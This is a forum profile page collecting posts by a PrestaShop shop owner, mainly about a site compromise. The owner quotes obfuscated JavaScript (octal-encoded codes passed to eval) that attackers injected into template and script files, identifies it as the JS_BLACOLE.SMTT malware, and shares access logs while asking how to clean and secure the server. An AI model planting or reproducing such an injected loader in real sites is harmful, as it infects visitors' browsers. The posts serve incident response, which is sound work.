Jump to content

sgnappo

Members
  • Posts

    35
  • Joined

  • Last visited

Contact Methods

Profile Information

  • Location
    Italy
  • Activity
    Freelancer

sgnappo's Achievements

Newbie

Newbie (1/14)

0

Reputation

  1. Here is it: http://about-threats.trendmicro.com/Malware.aspx?id=57883&name=JS_BLACOLE.SMTT&language=en
  2. Yes, until now everything is fine. However the name of the virus is "JS_Blacole_SMTT". I have downloaded the whole site on my PC and my antivirus has detected it and removed the code from all files. I let you updated Regards Salvatore
  3. I have read the thread and it is very similar to my issue. However, I have just uploaded a clean versione of PS and the site is running. I am waiting for new changes :-). I hope none. Thanks Salvatore
  4. Yes, I checked lines close the time of change (6.03am). --------ACCESS LOG------- 77.88.26.27 - - [03/Jun/2013:05:56:55 +0200] "GET /robots.txt HTTP/1.1" 200 2334 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" 77.88.26.27 - - [03/Jun/2013:05:56:57 +0200] "GET /18851-home_default/toner-originale-canon-fx-4.jpg HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)" 66.249.72.25 - - [03/Jun/2013:06:00:38 +0200] "GET /toner-rigenerati/818-toner-rigenerato-brother-dr-300.html HTTP/1.1" 503 659 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.72.25 - - [03/Jun/2013:06:02:37 +0200] "GET /toner-rigenerati/818-toner-rigenerato-brother-dr-300.html HTTP/1.1" 503 659 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 173.199.116.195 - - [03/Jun/2013:06:03:16 +0200] "GET /271-cartucce-compatibili-stampanti-brother-intellifax-2300ml HTTP/1.1" 503 666 "-" "Mozilla/5.0 (compatible; AhrefsBot/4.0; +http://ahrefs.com/robot/)" 66.249.72.25 - - [03/Jun/2013:06:03:26 +0200] "GET /60-cartucce-compatibili-stampanti-brother-dcp-185c HTTP/1.1" 503 660 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 65.36.241.76 - - [03/Jun/2013:06:04:15 +0200] "GET / HTTP/1.1" 503 1233 "-" "InternetSeer.com" ------------------- No connections related PHP scripts :-(
  5. The log files contains a lot of Bots access. These accesses are suspect: 173.199.116.195 AhrefsBot/4.0; +http://ahrefs.com/robot 77.88.26.27 YandexImages/3.0; +http://yandex.com/bots 184.170.134.30 Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729 There are no Cron Jobs. Now I am downloading all files in order to check if there is an external script inside. Have you other suggestions? Thanks and regards Salvatore Regards
  6. Hi Vekia / Bill Dalton, thanks for reply. On my server (a dedicated host on a cloud platform) there is only one web site with Prestashop. There are only Prestahop addons. I don't think my PC is tyhe problem. No virus/malware was found by the antivirus and then after I cleaned all files, the site was running for one day and then again the same problem. There have been two modification in the last 12 hours. Yesterday at 22.00 and today at 06.00 all files have been modified again. Should be a script hosted on the server which runs automatically? How to find it? PS: The Back-end is running. Many thanks for replies. Regards Salvatore
  7. Hi to all, yesterday my web site with prestashop 1.5.3.1 returned only a blank page. I activated the displaying of errors and so I seen that the following error was returned: Fatal error: Uncaught exception 'SmartyCompilerException' with message 'Syntax Error in template "/var/www/clients/client1/web1/web/modules/blockcurrencies/blockcurrencies.tpl" on line 62 "</div><!--0c0896--><script type="text/javascript" language="javascript" > ps="split";asd=function(){d.body++};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,155,147,153,160,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,155,147,153,160,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,173,173,173,62,152,171,152,155,157,151,166,170,62,154,171,63,147,163,171,162,170,151,166,62,164, in /var/www/clients/client1/web1/web/tools/smarty/sysplugins/smarty_internal_templatecompilerbase.php on line 627 I accessed to files through FTP and I seen that the file blockcurrencies.tpl was modified on the same day and inside there was the following code: <!--0c0896--> <script type="text/javascript" language="javascript"> ps="split";asd=function(){d.body++};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,...."[ps](","));ss=String;d=document;for(i=0;i<a.length;i+=1){a[i]=-(7-3)+parseInt(a[i],8);}try{asd()}catch(q){zz=0;}try{zz/=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss.fromCharCode.apply(ss,a)); </script> <!--/0c0896--> I deleted that code but the error was returned on another page. All index.php, .tpl and .js files were modified with that malicious code. In a couple of hours I cleaned all files....but today I have again the same problem with all files modified and the web site off. How can I prevent this issue? My file have 644 permissions but this is not enough. Please help me to secure the site. Many thanks Regards Salvatore
  8. Hi maze, I have the same issue. Have you found a solution? Thanks and regards Salvatore
  9. Si, LEFT JOIN è meglio! Un ultima domanda: E' possibile prendere i dati di connessione al DB senza doverli scrivere nel file mysql.class.php? Grazie ancora Ciao Salvatore
  10. ok, fatto! La nuova query dovrebbe essere: $q = "select a.*, c.name country, s.name state from ps_address a join ps_country_lang c on a.id_country = c.id_country join ps_state s on a.id_state = s.id_state where a.id_address = $id_address and c.id_lang = 1 "; Sei stato di grande aiuto...ti ringrazio. Ciao Salvatore
  11. Ok, sono riuscito ad integrare il codice. C'è solo un piccolo problemino: non stampa più la provincia. Ho provato a vedere nella tabella ps_address ma non è lì. Dove si trova? Ciao Salvatore
  12. Ciao alreadynight; prima di tutto grazie per aver condiviso il lavoro fatto. La soluzione mi sembra accettabile ma provando a fare quanto indicato e provando ad aprire una Fattura dal BO mi esce una pagina bianca. Ho notato che ciò succede alla riga dove c'è il codice: {$order->getUniqReference()|invoiceCF} La chiamata è corretta? Devo fare qualche inclusione/import? Fammi sapere Ciao e grazie Salvatore
  13. Hi to all, I have installed the PS 1.5.3.1 with two shipping method (DHL, DHL2) and I would like to know how to modify that one assigned to an Order from the BO. For example: A customer choose to deliver via DHL and later I change it to DHL2 and viceversa. Thanks Regards Salvatore -- Cartucce e Toner Ricette dal Mondo
  14. Ciao Armadillo2, sei riuscito con le modifiche? Facci sapere Ciao e grazie Salvatore -- Cartucce e Toner Ricette dal Mondo
×
×
  • Create New...

Important Information

Cookies ensure the smooth running of our services. Using these, you accept the use of cookies. Learn More